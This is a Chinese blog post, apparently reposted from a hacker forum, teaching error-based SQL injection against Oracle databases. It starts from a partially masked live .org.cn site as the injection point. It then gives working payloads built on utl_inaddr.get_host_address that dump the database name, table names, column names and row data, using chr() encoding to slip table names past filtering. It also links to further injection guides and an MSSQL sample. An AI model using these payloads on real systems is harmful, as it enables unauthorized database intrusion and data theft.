注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

 
 
 
 
 

日志

 
 

Oracle with error注入讲解  

2015-03-10 21:29:20|  分类: SQL injection |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
0x01
注入点:
http://***.org.cn//find***?sheng=1
输入--
Oracle with error注入讲解 - IversOn5 -
oracle,错误回显。
如果还不确定可以用
and (select conut(*) from dual)>0 判断
错误回显是不能通过union来查询的,只能通过error信息反馈来获取相关信息。

0x02
utl_inaddr.get_host_address 获取IP地址
利用这个函数,如果这个函数传递的内容无法得到解析返回一个oracle错误并显示传递的内容。

首先看下当前库:
Oracle with error注入讲解 - IversOn5 -
or 1=utl_inaddr.get_host_address((SELECT chr(39)||name||chr(39) FROM v$database where rownum=1))
chr(39)是'的ascii码,其实随便加不加


查看第一个表:
Oracle with error注入讲解 - IversOn5 -
or 1=utl_inaddr.get_host_address((select chr(39)||data||chr(39) from (selEct rownum as limit,table_name as data from user_tables) whEre limit =第几个表))
这里就随便讲解,爆表爆列都是按照第一个表来爆


查看JJH_ACTIVE_INFO下的字段:

Oracle with error注入讲解 - IversOn5 -
or 1=utl_inaddr.get_host_address((select chr(39)||data||chr(39) from (selEct rownum as limit,column_name as data from user_tab_columns whEre table_name=chr(74)||chr(74)||chr(72)||chr(95)||chr(65)||chr(67)||chr(84)||chr(73)||chr(86)||chr(69)||chr(95)||chr(73)||chr(78)||chr(70)||chr(79)) whEre limit =第几个字段))
由于JJH_ACTIVE_INFO无法直接查询我转换成了ascii码
看出第一个字段为SX6

查内容:

Oracle with error注入讲解 - IversOn5 -
or 1=utl_inaddr.get_host_address((Select chr(39)||data||chr(39) from (selEct rownum as limit,SX6 as data from JJH_ACTIVE_INFO)where limit =第几个内容))

0x03
本屌水笔不好,看不懂的可以保存日后好用。其实手注是蛮好的,其中的道理自己领悟...
这是oracle union sql的文章:
http://blackbap.org/forum.php?mod=viewthread&tid=2093&highlight=oracle
还有下面附上mssql with errer注入的doc

Mssql with error注入样例.rar (7.83 KB, 下载次数: 11)
其实30叫我写写mssql的,我只找到oracle的..
mysql的我就不说了,网上千篇一律

原文地址:http://bbs.blackbap.org/thread-6739-1-1.html
  评论这张
 
阅读(77)| 评论(0)
推荐

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017